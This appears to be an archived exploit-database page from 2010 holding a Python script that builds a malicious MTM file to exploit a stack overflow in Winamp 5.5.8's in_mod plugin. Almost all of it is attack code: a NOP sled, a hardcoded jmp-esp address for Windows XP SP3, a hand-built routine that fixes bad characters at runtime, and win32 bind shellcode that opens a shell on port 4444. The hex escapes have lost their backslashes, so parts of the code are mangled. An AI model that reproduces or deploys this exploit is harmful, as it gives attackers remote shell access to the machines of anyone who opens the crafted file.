[local exploits] - Winamp 5.5.8 (in_mod plugin) Stack Overfl
Posted on 20 October 2010
<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Strict//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd'><html xmlns='http://www.w3.org/1999/xhtml'><head><meta http-equiv='Content-Type' content='text/html; charset=utf-8' /><meta http-equiv='Content-Language' content='en' /><title>Winamp 5.5.8 (in_mod plugin) Stack Overflow Exploit | Inj3ct0r - exploit database : vulnerability : 0day : shellcode</title><meta name='description' content='Winamp 5.5.8 (in_mod plugin) Stack Overflow Exploit by Mighty-D in local exploits | Inj3ct0r - exploit database : vulnerability : 0day : shellcode' /><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon' /><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss' /><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></head><body><pre>=================================================== Winamp 5.5.8 (in_mod plugin) Stack Overflow Exploit =================================================== #!/usr/bin/python # Pwn And Beans by Mighty-D presents: # Winamp 5.5.8.2985 (in_mod plugin) Stack Overflow # WINDOWS XP SP3 FULLY PATCHED - NO ASLR OR DEP BYPASS... yet # Bug found by http://www.exploit-db.com/exploits/15248/ # POC by fdisk # Exploit by Mighty-D # Special thanks to: # fdisk: Who wrote the skeleton of what you are looking at # Ryujin: For pointing the bug # Muts: For bringing the pain and the omelet ideas that weren't used # dijital1 and All the EDB-Team # The guys from UdeA, Ryepes, HerreraDavid, GomezRam7 # Just one comment: Stupid badchars!!!!!!! header = "x4Dx54x4Dx10x53x70x61x63x65x54x72x61x63x6Bx28x6Bx6Fx73x6Dx6Fx73x69x73x29xE0x00x29x39x20xFFx1Fx00x40x0E" header += "x04x0C" * 16 nopsled = "x90" * 58207 eip = "xEDx1Ex95x7C" # jmp esp WIN XP SPANISH change at will patch_shellcode = "x90" * 16 patch_shellcode += "x90x33xDB" # Set EBX to zero patch_shellcode += "x54x5B" # PUSH ESP ; POP EBX GET THE RELATIVE POSITION patch_shellcode += "x81xEBx95xFCxFFxFF" # make EBX point to our shell patch_shellcode += "x43"*13 # Move EBX as close as we can to the first badchar patch_shellcode += "x90"*4 # Nop sled to avoid damage from CrLf patch_shellcode += "x43"*1 # Move EBX to the first badchar patch_shellcode += "x80x2Bx20" # Set it to 13 - verified patch_shellcode += "x43"*3 # Move EBX to the next badchar patch_shellcode += "x80x2Bx20" # Set it to 05 - verified patch_shellcode += "x43"*16 # Move EBX to the next badchar patch_shellcode += "x80x2BxEC" # Set it to 21 - verified patch_shellcode += "x43"*1 # Move EBX to the next badchar patch_shellcode += "x80x2Bx7C" # Set it to 8e - verified patch_shellcode += "x90"*8 # Nop sled to avoid damage from CrLf patch_shellcode += "x43"*30 # Move EBX to the next badchar patch_shellcode += "x80x2Bx20" # Set it to 05 - verified patch_shellcode += "x90"*8 # Nop sled to avoid damage from CrLf patch_shellcode += "x43"*11 # Move EBX to the next badchar patch_shellcode += "x80x2Bx42" # Set it to CB - verified patch_shellcode += "x43"*1 # Move EBX to the next badchar patch_shellcode += "x80x2Bx78" # Set it to 92 - verified patch_shellcode += "x90"*26 # Nop sled to avoid damage from CrLf patch_shellcode += "x43"*18 # Move EBX to the next badchar patch_shellcode += "x80x2Bx20" # Set it to 04 - verified patch_shellcode += "x90"*16 # Nop sled to avoid damage from CrLf patch_shellcode += "x43"*15 # Move EBX to the next badchar patch_shellcode += "x80x2Bx20" # Set it to 02 - verified patch_shellcode += "x43"*8 # Move EBX to the next badchar patch_shellcode += "x80x2Bx21" # Set it to EC - verified patch_shellcode += "x43"*1 # Move EBX to the next badchar patch_shellcode += "x80x2Bx7C" # Set it to 8e - verified patch_shellcode += "x90"*14 # Nop sled to avoid damage from CrLf patch_shellcode += "x43"*18 # Move EBX to the next badchar patch_shellcode += "x80x2Bx49" # Set it to c1 - verified patch_shellcode += "x90"*13 # Nop sled to avoid damage from CrLf patch_shellcode += "x43"*4 # Move EBX to the next badchar patch_shellcode += "x80x2Bx20" # Set it to EA, but we need F6 patch_shellcode += "x80x2BxF4" # Set it to F6 - verified patch_shellcode += "x43"*9 # Move EBX to the next badchar patch_shellcode += "x80x2Bx20" # Set it to 11 - verified patch_shellcode += "x43"*10 # Move EBX to the next badchar patch_shellcode += "x90"*3 # Nop sled to avoid damage from CrLf patch_shellcode += "x80x2BxCD" # Set it to 3D - verified patch_shellcode += "x43"*3 # Move EBX to the next badchar patch_shellcode += "x80x2Bx20" # Set it to 07 - verified patch_shellcode += "x43"*11 # Move EBX to the next badchar patch_shellcode += "x80x2Bx20" # Set it to 12 - verified patch_shellcode += "x43"*4 # Move EBX to the next badchar patch_shellcode += "x80x2Bx20" # Set it to 12 - verified patch_shellcode += "x90"*13 # Nop sled to avoid damage from CrLf patch_shellcode += "x43"*4 # Move EBX to the next badchar patch_shellcode += "x80x2Bx20" # Set it to 12 - verified patch_shellcode += "x43"*8 # Move EBX to the next badchar patch_shellcode += "x80x2Bx20" # Set it to 12 - verified patch_shellcode += "x90"*19 # Nop sled to avoid damage from CrLf patch_shellcode += "x43"*11 # Move EBX to the next badchar patch_shellcode += "x80x2Bx8E" # Set it to 7F - verified patch_shellcode += "x43"*1 # Move EBX to the next badchar patch_shellcode += "x80x2BxDF" # Set it to 2B - verified patch_shellcode += "x43"*8 # Move EBX to the next badchar patch_shellcode += "x80x2Bx1E" # Set it to EC - verified patch_shellcode += "x90"*11 # Nop sled to avoid damage from CrLf patch_shellcode += "x43"*12 # Move EBX to the next badchar patch_shellcode += "x80x2Bx20" # Set it to 8 - verified patch_shellcode += "x90"*28 # Nop sled to avoid damage from CrLf patch_shellcode += "x43"*29 # Move EBX to the next badchar patch_shellcode += "x80x2Bxa7" # Set it to 66 - verified patch_shellcode += "x43"*1 # Move EBX to the next badchar patch_shellcode += "x90"*4 # Nop sled to avoid damage from CrLf patch_shellcode += "x80x2Bxb8" # Set it to 52 - verified patch_shellcode += "x90"*9 # Nop sled to avoid damage from CrLf patch_shellcode += "x43"*17 # Move EBX to the next badchar patch_shellcode += "x80x2Bx20" # Set it to 3 - verified patch_shellcode += "x90"*9 # Nop sled to avoid damage from CrLf patch_shellcode += "x43"*3 # Move EBX to the next badchar patch_shellcode += "x80x2Bx20" # Set it to 12 - verified patch_shellcode += "x90"*12 # Nop sled to avoid damage from CrLf patch_shellcode += "x43"*2 # Move EBX to the next badchar patch_shellcode += "x80x2Bx20" # Set it to 3 - verified patch_shellcode += "x43"*7 # Move EBX to the next badchar patch_shellcode += "x80x2Bx20" # Set it to 2 - verified patch_shellcode += "x90"*10 # Nop sled to avoid damage from CrLf patch_shellcode += "x43"*6 # Move EBX to the next badchar patch_shellcode += "x80x2Bx20" # Set it to 13 - verified patch_shellcode += "x43"*3 # Move EBX to the next badchar patch_shellcode += "x80x2Bx20" # Set it to 5 - verified patch_shellcode += "x43"*3 # Move EBX to the next badchar patch_shellcode += "x80x2Bx1B" # Set it to F2 - verified patch_shellcode += "x43"*1 # Move EBX to the next badchar patch_shellcode += "x80x2BxF4" # Set it to 16 - verified patch_shellcode += "x90"*19 # Nop sled to avoid damage from CrLf patch_shellcode += "x43"*4 # Move EBX to the next badchar patch_shellcode += "x80x2Bx20" # Set it to 10 - verified patch_shellcode += "x43"*4 # Move EBX to the next badchar patch_shellcode += "x80x2Bx20" # Set it to 10 - verified patch_shellcode += "x90"*20 # Nop sled to avoid damage from CrLf patch_shellcode += "x43"*17 # Move EBX to the next badchar patch_shellcode += "x90"*28 # Lazy nopsled patch_shellcode += "x43"*16 # Move EBX to the next badchar patch_shellcode += "x80x2Bx26" # Set it to E7 - verified patch_shellcode += "x90"*18 # Nop sled to avoid damage from CrLf patch_shellcode += "x43"*1 # Move EBX to the next badchar patch_shellcode += "x80x2BxBE" # Set it to 4C - verified patch_shellcode += "x43"*7 # Move EBX to the next badchar patch_shellcode += "x80x2Bx20" # Set it to 5 - verified patch_shellcode += "x90"*(66) # win32_bind - EXITFUNC=process LPORT=4444 Size=344 Encoder=PexFnstenvSub shellcode = "x29xc9x83xe9xb0xd9xeexd9x74x24xf4x5bx81x73" shellcode += "x33" # Should be 13 shellcode += "xa9x41" shellcode += "x25" # should be 05 shellcode += "x3fx83xebxfcxe2xf4x55x2bxeex72x41xb8xfaxc0" shellcode += "x56" # x21x8e Ripped shellcode += "x53x8dx65x8ex7ax95xcax79x3axd1x40xeaxb4" shellcode += "xe6x59x8ex60x89x40xeex76x22x75x8ex3ex47x70xc5xa6" shellcode += "x25" # should be 05 shellcode += "xc5xc5x4bxaex80xcfx32xa8x83xee" # xcbx92 shellcode += "x15x21x17" shellcode += "xdcxa4x8ex60x8dx40xeex59x22x4dx4exb4xf6x5d" shellcode += "x24" #Should be 04 shellcode += "xd4xaax6dx8exb6xc5x65x19x5ex6ax70xdex5bx22" shellcode += "x22" # Should be 02 shellcode += "x35xb4xe9x4dx8ex4fxb5" # xec8e Ripped shellcode += "x7fxa1x1fx6dxb1xe7x4fxe9x6f" shellcode += "x56x97x63x6cxcfx29x36x0d" # xc1 Ripped shellcode += "x36x76x0d" # xf6 ripped shellcode += "x15xfaxef" shellcode += "xc1x8axe8xc3x92" shellcode += "x31" # Should be 11 shellcode += "xfaxe9xf6xc8xe0x59x28xacx0d" # x3d ripped shellcode += "xfcx2b" shellcode += "x27" # should be 07 shellcode += "xc0x79x29xdcx36x5cxecx52xc0x7f" shellcode += "x32" # should be 12 shellcode += "x56x6cxfa" shellcode += "x32" # should be 12 shellcode += "x46x6cxea" shellcode += "x32" # should be 12 shellcode += "xfaxefxcfx29x14x63xcf" shellcode += "x32" #should be 12 shellcode += "x8cxde" shellcode += "x3cx29xa1x25xd9x86x52xC0" # x7fx2b Ripped shellcode += "x15x6exfcxbexd5x57" shellcode += "x0d" # xec Ripped shellcode += "x2bxd6xfexbexd3x6cxfcxbexd5x57x4c" shellcode += "x28" # should be 08 shellcode += "x83x76" shellcode += "xfexbexd3x6fxfdx15x50xc0x79xd2x6dxd8xd0x87x7cx68" shellcode += "x56x97x50xc0x79x27x6fx5bxcfx29" # x66x52 Ripped shellcode += "x20xa4x6fx6f" shellcode += "xf0x68xc9xb6x4ex2bx41xb6x4bx70xc5xcc" shellcode += "x23" # shoudl be 03 shellcode += "xbfx47" shellcode += "x32" #Should be 12 shellcode += "x57" shellcode += "x23" # Should be 03 shellcode += "x29xacx24x3bx3dx94" shellcode += "x22" # should be 02 shellcode += "xeax6dx4dx57xf2" shellcode += "x33" # should be 13 shellcode += "xc0xdc" shellcode += "x25" # should be 5 shellcode += "xfaxe9" # xf2x16 Ripped shellcode += "x57x6exf8" shellcode += "x30" #should be 10 shellcode += "x6fx3exf8" shellcode += "x30" # Should be 10 shellcode += "x50x6e" shellcode += "x56x91x6dx92x70x44xcbx6cx56x97x6fxc0x56x76xfaxef" shellcode += "x22x16xf9xbcx6dx25xfaxe9xfbxbexd5" shellcode += "x57xd7x99" #xe7x4c Ripped shellcode += "xfaxbexd3xc0x79x41" shellcode += "x25" # should be 05 shellcode += "x3f" payload = header + nopsled + eip + patch_shellcode + shellcode try: file = open("crash.mtm", "w") file.write(payload) file.close() print "MTM file generated successfuly" except: print "Cannot create file" # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-10-20]</pre></body></html>
